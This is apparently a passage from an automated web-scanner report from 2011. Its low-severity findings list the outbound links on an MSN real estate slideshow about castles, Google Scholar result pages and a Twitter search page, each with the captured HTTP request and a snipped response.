<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home">Careers & Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections & Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a>
...[SNIP]...
<span class="blogo"><a href="http://www.bing.com/search?FORM=MSREAL">Bing</a>
...[SNIP]...
<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296661226&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Frealestate.msn.com%2Fslideshow.aspx%3Fcp-documentid%3D27434033&lc=1033&id=74430" class="dMSNME_1">Sign in</a>
...[SNIP]...
<div><a id="wslink" href="http://www.bing.com/search">Search the web</a>
...[SNIP]...
</strong><a id="hplink" href="http://www.myhomemsn.com/">Make msn.com your home page</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com?form=SYNDRE"><strong>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=fannie+freddie+legal+fees+probe&form=SYNDRE"><span class="custom">
...[SNIP]...
<li><a href="http://www.bing.com/search?q=home+ownership+pre+boom&form=SYNDRE"><span class="custom">
...[SNIP]...
<li><a href="http://www.bing.com/search?q=johnny+depp+venice&form=SYNDRE"><span class="custom">
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search?q=Fabrice+Tourre+cannot+delay+SEC+case&form=SYNDRE"><span class="custom">
...[SNIP]...
<p class="partnerlogo cf"><a href="http://www.mainstreet.com?cm_ven=msmsnp" onclick="return Msn.Navigation.OpenPopup(event,this)"><img src="http://blstb.msn.com/i/FA/4BC6C383C521DF05EF28F38475ECA.jpg" alt="MainStreet" />
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XBbo7RakUQJTOAszApQ3LpXKJQhFIUQZF?mkt=en-us"><img alt="avatar" src="http://us.social.s-msn.com/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XUydHDfK83vqxDm4ELlgKuUQCTzkEoIKQ?mkt=en-us"><img alt="avatar" src="http://us.social.s-msn.com/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/Xkk6ASUQx2vdQO8kwU6hQv2-ebmMakQ9t?mkt=en-us"><img alt="avatar" src="http://us.social.s-msn.com/s/images/bluemannxl.png" /></a>
...[SNIP]...
<div class="ic-usr-nm"><a href="http://cid-8097868aeb7be4b1.profile.live.com/msn/posts?mkt=en-US&domain=en-US">Dominique
..(laofatractn)
</a>
...[SNIP]...
<div class="ic-usr-img"><a class="ic-usr-pro-url" href="http://cid-8097868aeb7be4b1.profile.live.com/msn/posts?mkt=en-US&domain=en-US"><img alt="avatar" src="http://us.social.s-msn.com/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XAO23G_8eEaI7ymQGsGexU71-xbJ46QQQ?mkt=en-us"><img alt="avatar" src="http://us.social.s-msn.com/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XWqWxBmArnRCkX1sc7vO_NDME9WqMvHHQ?mkt=en-us"><img alt="avatar" src="http://us.social.s-msn.com/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XEFFT1kaM0oNFoz6-lYf0Ep1MA3jYqBy2?mkt=en-us"><img alt="avatar" src="http://us.social.s-msn.com/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XECyELvjsN-jH35QXpiFHwtC7fhJlzg0h?mkt=en-us"><img alt="avatar" src="http://us.social.s-msn.com/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XcCGNNzPLNTVKaSOdPffhZaGGNXHnWFYL?mkt=en-us"><img alt="avatar" src="http://us.social.s-msn.com/s/images/bluemannxl.png" /></a>
...[SNIP]...
<div class="ic-usr-nm"><a href="http://cid-49901d2abfb26279.profile.live.com/msn/posts?mkt=en-US&domain=en-US">Someone
..(StGlen333)
</a>
...[SNIP]...
<div class="ic-usr-img"><a class="ic-usr-pro-url" href="http://cid-49901d2abfb26279.profile.live.com/msn/posts?mkt=en-US&domain=en-US"><img alt="avatar" src="http://us.social.s-msn.com/s/images/bluemannxl.png" /></a>
...[SNIP]...
<span>Please help us to maintain a healthy and vibrant community by reporting any illegal or inappropriate behavior. If you believe a message violates the<a id="raconductcode" class="iucRptLnk" href="http://help.live.com/help.aspx?mkt=en-gb&project=tou&querytype=keyword&query=coc" title="View the code of conduct in a new window">Code of Conduct</a>
...[SNIP]...
<cite>By..Mark David..of..<a href="http://www.mainstreet.com?cm_ven=msmsnp" onclick="return Msn.Navigation.OpenPopup(event,this)">MainStreet</a>
...[SNIP]...
<p>Truly worthy of royalty, the estate sprawls across 64 acres with more than 1,000 feet on the <a href="http://www.bing.com/search?q=Housatonic+River&go=&form=MSREAL" onclick="window.open(this.href);return false;">Housatonic River</a>. The mansion was built in 1889 for Mary Hopkins, the widow of railroad magnate <a href="http://www.bing.com/search?q=Mark+Hopkins+railroad&form=MSREAL" onclick="window.open(this.href);return false;">Mark Hopkins</a>
...[SNIP]...
</strong><a href="http://www.facebook.com/msnrealestate" onclick="window.open(this.href);return false;">Become a fan of MSN Real Estate</a>
...[SNIP]...
<p>Searles Castle, designed by the famed architecture firm <a href="http://www.bing.com/search?q=McKim%2C+Mead+and+White&go=&form=MSREAL" onclick="window.open(this.href);return false;">McKim, Mead and White</a>
...[SNIP]...
</strong> <a href="http://msn.foxsports.com/nba/story/Miami-Heat-buy-former-star-guard-Tim-Hardaway-mansion-012711" onclick="window.open(this.href);return false;">NBA team reportedly buys former star's mansion</a>
...[SNIP]...
<p>Searles Castle has many vast and grand entertainment spaces, including a <a href="http://www.bing.com/search?q=Louis+XIV&go=&form=MSREAL" onclick="window.open(this.href);return false;">Louis XIV</a>
...[SNIP]...
<p>The elegant interior spaces open up to large stone terraces with views of the manicured lawns and cross-shaped reflecting pool, and across the meadows to the surrounding <a href="http://www.bing.com/search?q=Berkshire+Mountains&go=&form=MSREAL" onclick="window.open(this.href);return false;">Berkshire Mountains</a>
...[SNIP]...
<li><a href="http://www.staceymatthews.com/Properties/122908-H/122908-H.html">View the online listing</a>
...[SNIP]...
</strong> <a href="http://msn.foxsports.com/nba/story/Miami-Heat-buy-former-star-guard-Tim-Hardaway-mansion-012711" onclick="window.open(this.href);return false;">NBA team reportedly buys former star's mansion</a>
...[SNIP]...
</strong> <a href="http://www.facebook.com/msnrealestate" onclick="window.open(this.href);return false;">Become a fan of MSN Real Estate</a>
...[SNIP]...
<li><a href="http://public.superlativestudio.com/IDXDetail.aspx?segmentid=1477012&mlstableid=UPLOAD&mlsnum=634111637732752924_39020&rid=0&uid=39020">View the online listing</a>
...[SNIP]...
</strong> <a href="http://www.facebook.com/msnrealestate" onclick="window.open(this.href);return false;">Become a fan of MSN Real Estate</a>
...[SNIP]...
<li><a href="http://www.solarcastleforsale.com/index.html">View the online listing</a>
...[SNIP]...
<p>A long drive that winds through 10 private wooded acres in tiny <a href="http://www.bing.com/search?q=traveler%27s+rest+south+carolina&go=&form=MSREAL" onclick="window.open(this.href);return false;">Travelers Rest, S.C.</a>
...[SNIP]...
<p>Details reminiscent of classic castle architecture include the building's stone construction, <a href="http://www.bing.com/search?q=crenelated+walls&go=&form=MSREAL" onclick="window.open(this.href);return false;">crenelated walls</a>
...[SNIP]...
y kitchen with walk-in pantry and pewter-glazed cabinetry, bedrooms with soaring ceilings and private bathrooms, and a library with curved red-oak cabinets that looks like it was taken straight out of <a href="http://www.bing.com/search?q=hogwarts&form=MSREAL" onclick="window.open(this.href);return false;">Hogwarts</a>
...[SNIP]...
<li><a href="http://www.dynamicupstate.com/">View the online listing</a>
...[SNIP]...
<p>The expansive property, dotted with old-growth oak trees and crisscrossed by riding trails, is an entertainer's paradise perfect for a home-grown <a href="http://www.bing.com/search?q=Renaissance+Fair&go=&form=MSREAL" onclick="window.open(this.href);return false;">Renaissance Fair</a>
...[SNIP]...
</strong> <a href="http://msn.foxsports.com/nba/story/Miami-Heat-buy-former-star-guard-Tim-Hardaway-mansion-012711" onclick="window.open(this.href);return false;">NBA team reportedly buys former star's mansion</a>
...[SNIP]...
<p>For more information, contact Vicki Beers (619-840-6813) or Marcia Spurgeon (619-729-6622) at <a href="http://www.realestateresults.net/" onclick="window.open(this.href);return false;">Real Estate Results</a>
...[SNIP]...
<li><a href="http://www.realestateresults.net/castle.php" onclick="window.open(this.href);return false;">View the online listing</a>
...[SNIP]...
<li class="first"><a href="http://www.mainstreet.com/slideshow/real-estate/extreme-real-estate/live-pop-diva?cm_ven=msmsnp">How to live like a pop diva</a>
...[SNIP]...
<li><a href="http://www.mainstreet.com/slideshow/real-estate/extreme-real-estate/own-your-own-winter-resort?cm_ven=msmsnp">High-end ski chalets for snow fans</a>
...[SNIP]...
<li><a href="http://www.mainstreet.com/article/real-estate/buying/it-time-buy-new-home?cm_ven=msmsnp">Is it time to buy a new home?</a>
...[SNIP]...
<li class="last"><a href="http://www.mainstreet.com/article/real-estate/buying/5-mortgage-trends-2011?cm_ven=msmsnp">5 mortgage trends for 2011</a>
...[SNIP]...
<div class="child c1 first"><script type="text/javascript" src="http://realestate.msn.us.intellitxt.com/ast/js/msn/realestate.msn_cs.js"></script>
...[SNIP]...
<p><a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://twitter.com/msnrealestate?ocid=TXT_MSNCH_REALESTATE_FollowMSN">Follow us</a> on Twitter and <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://facebook.com/MSNRealEstate?ocid=TXT_MSNCH_REALESTATE_FollowMSN">become a fan</a>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170">MSN privacy</a>
...[SNIP]...
<div><img src="http://msnportalrealest.112.2O7.net/b/ss/msnportalrealest/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...

17.165. http://scholar.google.com/scholar previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://scholar.google.com
Path:	/scholar

Issue detail

The page was loaded from a URL containing a query string:

http://scholar.google.com/scholar?hl=en&q=ges&um=1&ie=UTF-8&sa=N&tab=ws

The response contains the following links to other domains:

http://74.125.155.132/scholar?q=cache:HLaOiE6wbq4J:scholar.google.com/+ges&hl=en&as_sdt=0,9
http://74.125.155.132/scholar?q=cache:RrtQnTpMu7IJ:scholar.google.com/+ges&hl=en&as_sdt=0,9
http://74.125.155.132/scholar?q=cache:uzBEsxjt2-oJ:scholar.google.com/+ges&hl=en&as_sdt=0,9
http://article.pubs.nrc-cnrc.gc.ca/ppv/RPViewDoc?issn=1208-6045&volume=44&issue=4&startPage=797&ab=y
http://cebp.aacrjournals.org/content/16/6/1246.full
http://direct.bl.uk/research/26/3A/RN210703158.html?source=googlescholar
http://direct.bl.uk/research/53/5D/EN002056770.html?source=googlescholar
http://jama.ama-assn.org/cgi/content/summary/141/16/1123
http://onlinelibrary.wiley.com/doi/10.1111/j.1432-1033.1991.tb16207.x/full
http://respiratory-research.com/content/2/1/33/ref
http://www.ehleringer.net/Jim/Publications/157.pdf
http://www.jstor.org/stable/2389955
http://www.ojrd.com/content/4/1/7/ref
http://www.plantphysiol.org/cgi/content/abstract/79/3/885
http://www.plantphysiol.org/cgi/reprint/79/3/885.pdf
http://www.youtube.com/results?hl=en&q=ges&um=1&ie=UTF-8&sa=N&tab=s1
http://www3.interscience.wiley.com/journal/119225864/abstract

Request

GET /scholar?hl=en&q=ges&um=1&ie=UTF-8&sa=N&tab=ws HTTP/1.1
Host: scholar.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Set-Cookie: GSP=ID=09ce30798e1a8ca0; expires=Sun, 17-Jan-2038 19:14:07 GMT; path=/; domain=.scholar.google.com
Set-Cookie: PREF=ID=09ce30798e1a8ca0:TM=1296661267:LM=1296661267:S=_mQzQg5tgX1VVUlB; expires=Fri, 01-Feb-2013 15:41:07 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Date: Wed, 02 Feb 2011 15:41:07 GMT
Server: scholar
Expires: Wed, 02 Feb 2011 15:41:07 GMT
Cache-Control: private
Connection: close

<html><head><meta http-equiv="content-type" content="text/html;charset=UTF-8"><meta http-equiv="imagetoolbar" content="no"><title>ges - Google Scholar</title><style>#gbar,#guser{font-size:13px;padding
...[SNIP]...
</div><a href="http://www.youtube.com/results?hl=en&q=ges&um=1&ie=UTF-8&sa=N&tab=s1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
</span> <a href="http://respiratory-research.com/content/2/1/33/ref" onmousedown="return scife_clk(this.href,'ggp','res','0')">1. Macklin CC: The pulmonary alveolar mucoid film and the pneumonocytes.</a>
...[SNIP]...
<span class="gs_ggs gs_fl"><a href="http://respiratory-research.com/content/2/1/33/ref" onmousedown="return scife_clk(this.href,'gga','gga','0')"><span class=gs_ctg2>
...[SNIP]...
</a> - <a href="http://74.125.155.132/scholar?q=cache:uzBEsxjt2-oJ:scholar.google.com/+ges&hl=en&as_sdt=0,9">Cached</a>
...[SNIP]...
<h3><a href="http://www3.interscience.wiley.com/journal/119225864/abstract" onmousedown="return scife_clk(this.href,'','res','1')">Seasonal net carbon dioxide exchange of a beech forest with the atmosphere</a>
...[SNIP]...
</span> <a href="http://cebp.aacrjournals.org/content/16/6/1246.full" onmousedown="return scife_clk(this.href,'ggp','res','2')">Phase I dose escalation pharmacokinetic study in healthy volunteers of resveratrol, a potential cancer chemopreventive agent</a>
...[SNIP]...
<span class="gs_ggs gs_fl"><a href="http://cebp.aacrjournals.org/content/16/6/1246.full" onmousedown="return scife_clk(this.href,'gga','gga','2')"><span class=gs_ctg2>
...[SNIP]...
</a> - <a href="http://direct.bl.uk/research/26/3A/RN210703158.html?source=googlescholar" onmousedown="return scife_clk(this.href,'','docdel','2')">BL Direct</a>
...[SNIP]...
<h3><a href="http://jama.ama-assn.org/cgi/content/summary/141/16/1123" onmousedown="return scife_clk(this.href,'','res','3')">Some newer aspects of the management of infertility</a>
...[SNIP]...
</span> <a href="http://www.ojrd.com/content/4/1/7/ref" onmousedown="return scife_clk(this.href,'ggp','res','4')">3. Klintworth GK: The molecular genetics of the corneal dystrophies...current status.</a>
...[SNIP]...
<span class="gs_ggs gs_fl"><a href="http://www.ojrd.com/content/4/1/7/ref" onmousedown="return scife_clk(this.href,'gga','gga','4')"><span class=gs_ctg2>
...[SNIP]...
</a> - <a href="http://74.125.155.132/scholar?q=cache:HLaOiE6wbq4J:scholar.google.com/+ges&hl=en&as_sdt=0,9">Cached</a>
...[SNIP]...
<h3><a href="http://www.plantphysiol.org/cgi/content/abstract/79/3/885" onmousedown="return scife_clk(this.href,'','res','6')">Germination, respiration, and adenylate energy charge of seeds at various oxygen partial pressures</a>
...[SNIP]...
<span class="gs_ggs gs_fl"><a href="http://www.plantphysiol.org/cgi/reprint/79/3/885.pdf" onmousedown="return scife_clk(this.href,'gga','gga','6')"><span class=gs_ctg2>
...[SNIP]...
<h3><a href="http://onlinelibrary.wiley.com/doi/10.1111/j.1432-1033.1991.tb16207.x/full" onmousedown="return scife_clk(this.href,'','res','7')">Kinetic studies of the variations of cytoplasmic pH, nucleotide triphosphates (31P...NMR) and lactate during normoxic and anoxic transitions in maize root tips</a>
...[SNIP]...
<h3><a href="http://www.jstor.org/stable/2389955" onmousedown="return scife_clk(this.href,'','res','8')">Hydrogen and carbon isotope ratios of selected species of a Mediterranean macchia ecosystem</a>
...[SNIP]...
<span class="gs_ggs gs_fl"><a href="http://www.ehleringer.net/Jim/Publications/157.pdf" onmousedown="return scife_clk(this.href,'gga','gga','8')"><span class=gs_ctg2>
...[SNIP]...
</a> - <a href="http://direct.bl.uk/research/53/5D/EN002056770.html?source=googlescholar" onmousedown="return scife_clk(this.href,'','docdel','8')">BL Direct</a>
...[SNIP]...
<h3><a href="http://article.pubs.nrc-cnrc.gc.ca/ppv/RPViewDoc?issn=1208-6045&volume=44&issue=4&startPage=797&ab=y" onmousedown="return scife_clk(this.href,'','res','9')">Pressure broadening of the rotational Raman lines of some simple gases</a>
...[SNIP]...
</a> - <a href="http://74.125.155.132/scholar?q=cache:RrtQnTpMu7IJ:scholar.google.com/+ges&hl=en&as_sdt=0,9">Cached</a>
...[SNIP]...

17.166. http://scholar.google.com/scholar previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://scholar.google.com
Path:	/scholar

Issue detail

The page was loaded from a URL containing a query string:

http://scholar.google.com/scholar?q=millenium+boston&um=1&ie=UTF-8&sa=N&hl=en&tab=ws

The response contains the following links to other domains:

http://171.66.121.249/cgi/content/abstract/101/11/4583
http://171.66.121.249/cgi/content/abstract/98/12/3274
http://171.66.121.249/cgi/content/full/101/11/4583
http://171.66.121.249/cgi/content/full/98/12/3274
http://74.125.155.132/scholar?q=cache:QgMJVOD07UwJ:scholar.google.com/+millenium+boston&hl=en&as_sdt=0,9
http://bloodjournal.hematologylibrary.org/cgi/content/abstract/105/4/1448
http://bloodjournal.hematologylibrary.org/cgi/content/full/105/4/1448
http://direct.bl.uk/research/07/18/RN125738760.html?source=googlescholar
http://direct.bl.uk/research/18/3F/RN132117901.html?source=googlescholar
http://direct.bl.uk/research/32/39/RN171203466.html?source=googlescholar
http://direct.bl.uk/research/3B/5B/RN189112693.html?source=googlescholar
http://direct.bl.uk/research/4F/06/RN105348447.html?source=googlescholar
http://direct.bl.uk/research/53/1A/RN175889599.html?source=googlescholar
http://direct.bl.uk/research/5C/2B/RN023185982.html?source=googlescholar
http://fnicsearch.nal.usda.gov/bitstream/10113/36266/1/IND44288259.pdf
http://ideas.repec.org/a/fip/fedbne/y1997ijanp19-36.html
http://jas.fass.org/cgi/content/abstract/83/10/2357
http://jas.fass.org/cgi/content/full/83/10/2357
http://linkinghub.elsevier.com/retrieve/pii/S1357431000017147
http://onlinelibrary.wiley.com/doi/10.1111/j.1365-2141.2006.06161.x/full
http://www.jimmunol.org/cgi/content/abstract/170/3/1240
http://www.jimmunol.org/cgi/content/full/170/3/1240
http://www.liebertonline.com/doi/abs/10.1089/met.2008.0048
http://www.nature.com/onc/journal/v24/n31/abs/1208683a.html
http://www.ncbi.nlm.nih.gov/pmc/articles/PMC1351116/
http://www.youtube.com/results?q=millenium+boston&um=1&ie=UTF-8&hl=en&sa=N&tab=s1

Request

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Set-Cookie: GSP=ID=1524e3b5f366319b; expires=Sun, 17-Jan-2038 19:14:07 GMT; path=/; domain=.scholar.google.com
Set-Cookie: PREF=ID=1524e3b5f366319b:TM=1296661266:LM=1296661266:S=-zH5XuNrRNUiArmn; expires=Fri, 01-Feb-2013 15:41:06 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Date: Wed, 02 Feb 2011 15:41:06 GMT
Server: scholar
Expires: Wed, 02 Feb 2011 15:41:06 GMT
Cache-Control: private
Connection: close

<html><head><meta http-equiv="content-type" content="text/html;charset=UTF-8"><meta http-equiv="imagetoolbar" content="no"><title>millenium boston - Google Scholar</title><style>#gbar,#guser{font-size
...[SNIP]...
</div><a href="http://www.youtube.com/results?q=millenium+boston&um=1&ie=UTF-8&hl=en&sa=N&tab=s1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
<h3><a href="http://jas.fass.org/cgi/content/abstract/83/10/2357" onmousedown="return scife_clk(this.href,'','res','0')">Insulin resistance and compensation in Thoroughbred weanlings adapted to high-glycemic meals</a>
...[SNIP]...
<span class="gs_ggs gs_fl"><a href="http://jas.fass.org/cgi/content/full/83/10/2357" onmousedown="return scife_clk(this.href,'gga','gga','0')"><span class=gs_ctg2>
...[SNIP]...
</a> - <a href="http://direct.bl.uk/research/53/1A/RN175889599.html?source=googlescholar" onmousedown="return scife_clk(this.href,'','docdel','0')">BL Direct</a>
...[SNIP]...
<h3><a href="http://www.jimmunol.org/cgi/content/abstract/170/3/1240" onmousedown="return scife_clk(this.href,'','res','1')">Role for IL-10 in suppression mediated by peptide-induced regulatory T cells in vivo</a>
...[SNIP]...
<span class="gs_ggs gs_fl"><a href="http://www.jimmunol.org/cgi/content/full/170/3/1240" onmousedown="return scife_clk(this.href,'gga','gga','1')"><span class=gs_ctg2>
...[SNIP]...
</a> - <a href="http://direct.bl.uk/research/07/18/RN125738760.html?source=googlescholar" onmousedown="return scife_clk(this.href,'','docdel','1')">BL Direct</a>
...[SNIP]...
<h3><a href="http://ideas.repec.org/a/fip/fedbne/y1997ijanp19-36.html" onmousedown="return scife_clk(this.href,'','res','2')">Central bank independence and inflation targeting: monetary policy paradigms for the next <b>
...[SNIP]...
</a> - <a href="http://74.125.155.132/scholar?q=cache:QgMJVOD07UwJ:scholar.google.com/+millenium+boston&hl=en&as_sdt=0,9">Cached</a> - <a href="http://direct.bl.uk/research/5C/2B/RN023185982.html?source=googlescholar" onmousedown="return scife_clk(this.href,'','docdel','2')">BL Direct</a>
...[SNIP]...
<h3><a href="http://www.nature.com/onc/journal/v24/n31/abs/1208683a.html" onmousedown="return scife_clk(this.href,'','res','3')">Bik/NBK accumulation correlates with apoptosis-induction by bortezomib (PS-341, Velcade) and other proteasome inhibitors</a>
...[SNIP]...
<span class="gs_ggs gs_fl"><a href="http://www.ncbi.nlm.nih.gov/pmc/articles/PMC1351116/" onmousedown="return scife_clk(this.href,'gga','gga','3')"><span class=gs_ctg2>
...[SNIP]...
</a> - <a href="http://direct.bl.uk/research/32/39/RN171203466.html?source=googlescholar" onmousedown="return scife_clk(this.href,'','docdel','3')">BL Direct</a>
...[SNIP]...
<h3><a href="http://171.66.121.249/cgi/content/abstract/101/11/4583" onmousedown="return scife_clk(this.href,'','res','4')">Down-regulation of BRCA1 in BCR-ABL-expressing hematopoietic cells</a>
...[SNIP]...
<span class="gs_ggs gs_fl"><a href="http://171.66.121.249/cgi/content/full/101/11/4583" onmousedown="return scife_clk(this.href,'gga','gga','4')"><span class=gs_ctg2>
...[SNIP]...
</a> - <a href="http://direct.bl.uk/research/18/3F/RN132117901.html?source=googlescholar" onmousedown="return scife_clk(this.href,'','docdel','4')">BL Direct</a>
...[SNIP]...
<h3><a href="http://bloodjournal.hematologylibrary.org/cgi/content/abstract/105/4/1448" onmousedown="return scife_clk(this.href,'','res','5')">Gfi-1B plays a critical role in terminal differentiation of normal and transformed erythroid progenitor cells</a>
...[SNIP]...
<span class="gs_ggs gs_fl"><a href="http://bloodjournal.hematologylibrary.org/cgi/content/full/105/4/1448" onmousedown="return scife_clk(this.href,'gga','gga','5')"><span class=gs_ctg2>
...[SNIP]...
<h3><a href="http://onlinelibrary.wiley.com/doi/10.1111/j.1365-2141.2006.06161.x/full" onmousedown="return scife_clk(this.href,'','res','6')">BCR...ABL activates STAT3 via JAK and MEK pathways in human cells</a>
...[SNIP]...
</a> - <a href="http://direct.bl.uk/research/3B/5B/RN189112693.html?source=googlescholar" onmousedown="return scife_clk(this.href,'','docdel','6')">BL Direct</a>
...[SNIP]...
<h3><a href="http://171.66.121.249/cgi/content/abstract/98/12/3274" onmousedown="return scife_clk(this.href,'','res','7')">Role of p21Cip1/Waf1 in cell-cycle exit of endomitotic megakaryocytes</a>
...[SNIP]...
<span class="gs_ggs gs_fl"><a href="http://171.66.121.249/cgi/content/full/98/12/3274" onmousedown="return scife_clk(this.href,'gga','gga','7')"><span class=gs_ctg2>
...[SNIP]...
</a> - <a href="http://direct.bl.uk/research/4F/06/RN105348447.html?source=googlescholar" onmousedown="return scife_clk(this.href,'','docdel','7')">BL Direct</a>
...[SNIP]...
<h3><a href="http://www.liebertonline.com/doi/abs/10.1089/met.2008.0048" onmousedown="return scife_clk(this.href,'','res','8')">Chromium picolinate does not improve key features of metabolic syndrome in obese nondiabetic adults</a>
...[SNIP]...
<span class="gs_ggs gs_fl"><a href="http://fnicsearch.nal.usda.gov/bitstream/10113/36266/1/IND44288259.pdf" onmousedown="return scife_clk(this.href,'gga','gga','8')"><span class=gs_ctg2>
...[SNIP]...
<h3><a href="http://linkinghub.elsevier.com/retrieve/pii/S1357431000017147" onmousedown="return scife_clk(this.href,'','res','9')">Obesity and diabetes: an avalanche of new information</a>
...[SNIP]...

17.167. http://search.twitter.com/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://search.twitter.com
Path:	/search

Issue detail

The page was loaded from a URL containing a query string:

http://search.twitter.com/search?q=%23Jobs

The response contains the following links to other domains:

http://a0.twimg.com/profile_images/1215098341/Jonas_8bit_normal.jpg
http://a0.twimg.com/profile_images/920042753/tweetmyjobs_sq_normal.jpg
http://a1.twimg.com/profile_images/1184151373/Search4_logo_magnifying_glass_normal.PNG
http://a1.twimg.com/profile_images/1219638828/freelancex200_normal.jpg
http://a1.twimg.com/profile_images/703276101/RAN_stack_M1_colour_small_normal.gif
http://a1.twimg.com/profile_images/724494378/BriansWedding_sm_normal.png
http://a1.twimg.com/profile_images/760071996/start_tel-RGB-4x4-jpg_normal.jpg
http://a1.twimg.com/profile_images/849485520/14992782_N06_normal.jpg
http://a2.twimg.com/profile_images/1061280543/Citizens_normal.png
http://a2.twimg.com/profile_images/786613095/eBayClassifiedsWeb_73x73_normal.png
http://a3.twimg.com/profile_images/1149661580/twitter_logo_normal.png
http://bit.ly/e778vQ
http://bit.ly/fEgtoI
http://bit.ly/fGpD61
http://bit.ly/fWBBc6
http://bit.ly/fpsLyD
http://bit.ly/gLQ0kB
http://bit.ly/gbIsbI
http://bit.ly/gbs61S
http://bit.ly/gmQkKr
http://bit.ly/hY6yZR
http://bit.ly/ijLcnO
http://dlvr.it/
http://dlvr.it/FYnv3
http://tinyurl.com/4onalh5
http://tinyurl.com/4pm5268
http://tweetmyjobs.com/
http://twitterfeed.com/
http://www.broadbean.com/
http://www.managetwit.com/
http://www.tweetdeck.com/

Request

GET /search?q=%23Jobs HTTP/1.1
Host: search.twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Tue, 01 Feb 2011 14:32:38 GMT
Server: hi
Status: 200 OK
X-Served-From: slc1-aca-26-sr1
X-Runtime: 0.24240
Content-Type: text/html; charset=utf-8
X-Timeline-Cache-Hit: Hit
X-Served-By: slc1-adg-34-sr2.prod.twitter.com
Cache-Control: max-age=15, must-revalidate, max-age=300
Expires: Tue, 01 Feb 2011 14:37:38 GMT
Content-Length: 45967
Vary: Accept-Encoding
X-Varnish: 1759090210
Age: 0
Via: 1.1 varnish
X-Cache-Svr: slc1-adg-34-sr2.prod.twitter.com
X-Cache: MISS
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="content-type" content="text/html; charset=UTF-8">
       <meta name="descriptio
...[SNIP]...
<a href="http://twitter.com/rubyitsyou" onclick="pageTracker._setCustomVar(2, 'result_type', 'popular', 3);pageTracker._trackPageview('/exit/to/rubyitsyou');"><img alt="14992782_n06_normal" src="http://a1.twimg.com/profile_images/849485520/14992782_N06_normal.jpg" /></a>
...[SNIP]...
<a href="http://twitter.com/jonasdelosreyes" onclick="pageTracker._setCustomVar(2, 'result_type', 'popular', 3);pageTracker._trackPageview('/exit/to/jonasdelosreyes');"><img alt="Jonas_8bit_normal" src="http://a0.twimg.com/profile_images/1215098341/Jonas_8bit_normal.jpg" /></a>
...[SNIP]...
